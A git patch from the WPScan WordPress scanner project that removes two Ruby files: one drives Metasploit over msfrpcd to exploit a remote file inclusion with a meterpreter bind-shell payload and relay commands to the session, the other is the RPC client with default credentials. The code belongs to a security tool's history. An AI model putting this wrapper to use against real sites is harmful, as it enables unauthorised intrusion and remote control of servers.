From 0894b8f5b5d80434690392d993de5784dbfcf64c Mon Sep 17 00:00:00 2001 From: erwanlr Date: Thu, 17 Jan 2013 13:29:19 +0100 Subject: [PATCH] explot files removed --- lib/wpscan/exploit.rb | 207 ------------------------------------ lib/wpscan/msfrpc_client.rb | 143 ------------------------- spec/spec_helper.rb | 4 - 3 files changed, 354 deletions(-) delete mode 100644 lib/wpscan/exploit.rb delete mode 100644 lib/wpscan/msfrpc_client.rb diff --git a/lib/wpscan/exploit.rb b/lib/wpscan/exploit.rb deleted file mode 100644 index f6cf1ec4..00000000 --- a/lib/wpscan/exploit.rb +++ /dev/null @@ -1,207 +0,0 @@ -#!/usr/bin/env ruby - -#-- -# WPScan - WordPress Security Scanner -# Copyright (C) 2012-2013 -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -#++ - -# This library should contain all methods for exploitation. - -class Exploit - - attr_accessor :rhost, :type, :uri, :postdata - - def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port) - @wp_url = URI.parse(wp_url.to_s) - @rhost = @wp_url.host - @path = @wp_url.path - @type = type - @uri = uri - @postdata = postdata - @session_in_use = nil - @use_proxy = use_proxy - @proxy_addr = proxy_addr - @proxy_port = proxy_port - start() - end - - # figure out what to exploit - - def start() - if @type == "RFI" - puts - puts "[?] Exploit? [y/n]" - answer = Readline.readline - if answer =~ /^y/i - msf_module = "exploit/unix/webapp/php_include" - payload = "php/meterpreter/bind_tcp" - exploit(msf_module, payload) - else - return false - end - elsif @type == "SQLI" - end - end - - # exploit - - def exploit(msf_module, payload) - - exploit_info(msf_module,payload) - - if @postdata == "" - result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:PAYLOAD => payload}) - else - result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:POSTDATA => @postdata, :PAYLOAD => payload}) - end - - if result['result'] == "success" - puts "[*] Exploit worked! Waiting for a session..." - - session_spawn_timer = Time.new - while sessions.nil? or sessions.empty? - # wait for a session to spawn with a timeout of 1 minute - if Time.now - session_spawn_timer > 60 - puts "[ERROR] Session was not created... exiting." - return false - end - end - - choose_session() - - input = nil - while input.nil? - puts meterpreter_read(last_session_id()) - input = Readline.readline - if input == "exit" - kill_session(@session_in_use) - return false - end - meterpreter_write(last_session_id(), input) - input = nil - end - - else - puts "[ERROR] Exploit failed! :(" - return false - end - end - - # output our exploit data - - def exploit_info(msf_module,payload) - info = RpcClient.new.get_exploit_info(msf_module) - puts - puts "| [EXPLOIT]" - puts "| Name: " + info['name'] - puts "| Description: " + info['description'].gsub!("\t", "").gsub!("\n\n","\n").gsub!("\n", "\n| ").chop! - puts "| [OPTIONS]" - puts "| RHOST: " + @rhost - puts "| PATH: " + @path - puts "| URI: " + uri - puts "| POSTDATA: " + @postdata if @postdata != "" - puts "| Payload: " + payload - puts - end - - # not sure if this is needed?! not used. - - def job_id() - jobs = RpcClient.new.jobs() - puts jobs - end - - # all sessions and related session data - - def sessions() - sessions = RpcClient.new.sessions() - end - - # the last active session id created - - def last_session_id() - sessions.keys.last - end - - # a count of the amount of active sessions - - def session_count() - sessions().size - end - - # if there is more than 1 session, - # allow the user to choose one. - - def choose_session() - if session_count() >= 2 - puts "[?] We have " + session_count().to_s + " sessions running. Please choose one by id." - open_sessions = "" - sessions.keys.each do |open_session| - open_sessions += open_session.to_s + " " - end - puts open_sessions - use_session = Readline.readline - puts "Using session " + use_session.to_s - @session_in_use = use_session - else - puts "Using session " + last_session_id().to_s - @session_in_use = last_session_id() - end - end - - # kill a session by session id - - def kill_session(id) - begin - killed = RpcClient.new.kill_session(id) - if killed['result'] == "success" - puts "[-] Session " + id.to_s + " killed." - end - rescue - puts "[] Session " + id.to_s + " does not exist." - return false - end - end - - # read data from a shell, meterpreter is not classed - # as a shell. - - def read_shell(id) - RpcClient.new.read_shell(id)['data'] - end - - # write data to a shell, meterpreter is not classed - # as a shell. - - def write_shell(id, data) - RpcClient.new.write_shell(id, data) - end - - # read data from a meterpreter session - # data must be base64 decoded. - - def meterpreter_read(id) - Base64.decode64(RpcClient.new.meterpreter_read(id)['data']) - end - - # write data to a meterpreter session - # data must be base64 encoded. - - def meterpreter_write(id, data) - RpcClient.new.meterpreter_write(id, Base64.encode64(data)) - end - -end diff --git a/lib/wpscan/msfrpc_client.rb b/lib/wpscan/msfrpc_client.rb deleted file mode 100644 index 7261fa43..00000000 --- a/lib/wpscan/msfrpc_client.rb +++ /dev/null @@ -1,143 +0,0 @@ -#!/usr/bin/env ruby - -#-- -# WPScan - WordPress Security Scanner -# Copyright (C) 2012-2013 -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -#++ - -# This library should contain all methods to communicate with msfrpc. -# See framework/documentation/msfrpc.txt for further information. -# msfrpcd -S -U wpscan -P wpscan -f -t Web -u /RPC2 -# name = exploit/unix/webapp/php_include - -class RpcClient - - def initialize - @config = {} - @config['host'] = "127.0.0.1" - @config['path'] = "/RPC2" - @config['port'] = 55553 - @config['user'] = "wpscan" - @config['pass'] = "wpscan" - @auth_token = nil - @last_auth = nil - - begin - @server = XMLRPC::Client.new3( :host => @config["host"], :path => @config["path"], :port => @config["port"], :user => @config["user"], :password => @config["pass"]) - rescue => e - puts "[ERROR] Could not create XMLRPC object." - puts e.faultCode - puts e.faultString - end - end - - # login to msfrpcd - - def login() - result = @server.call("auth.login", @config['user'], @config['pass']) - - if result['result'] == "success" - @auth_token = result['token'] - @last_auth = Time.new - logged_in = true - else - puts "[ERROR] Invalid login credentials provided to msfrpcd." - logged_in = false - end - - end - - # check authentication - - def authenticate() - login() if @auth_token.nil? - login() if (Time.now - @last_auth > 600) - end - - # retrieve information about the exploit - - def get_exploit_info(name) - authenticate() - @server.call('module.info', @auth_token, 'exploit', name) - end - - # retrieve exploit options - - def get_options(name) - authenticate() - @server.call('module.options', @auth_token, 'exploit',name) - end - - # retrieve the exploit payloads - - def get_payloads(name) - authenticate() - @server.call('module.compatible_payloads', @auth_token, name) - end - - # execute exploit - - def exploit(name, opts) - authenticate() - @server.call('module.execute', @auth_token, 'exploit', name, opts) - end - - # list msf jobs - - def jobs() - authenticate() - @server.call('job.list', @auth_token) - end - - # list msf sessions - - def sessions() - authenticate() - @server.call('session.list', @auth_token) - end - - # kill msf session - - def kill_session(id) - authenticate() - @server.call('session.stop', @auth_token, id) - end - - # reads any pending output from session - - def read_shell(id) - authenticate() - @server.call('session.shell_read', @auth_token, id) - end - - # writes the specified input into the session - - def write_shell(id, data) - authenticate() - @server.call('session.shell_write', @auth_token, id, data) - end - - def meterpreter_read(id) - authenticate() - @server.call('session.meterpreter_read', @auth_token, id) - end - - def meterpreter_write(id, data) - authenticate() - @server.call('session.meterpreter_write', @auth_token, id, data) - end - -end diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index d1f6f96c..5dcf884c 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -27,10 +27,6 @@ if RUBY_VERSION >= "1.9" add_filter "_helper.rb" add_filter "environment.rb" add_filter "_plugin.rb" - - # Unused files at this time - add_filter "exploit.rb" - add_filter "msfrpc_client.rb" end end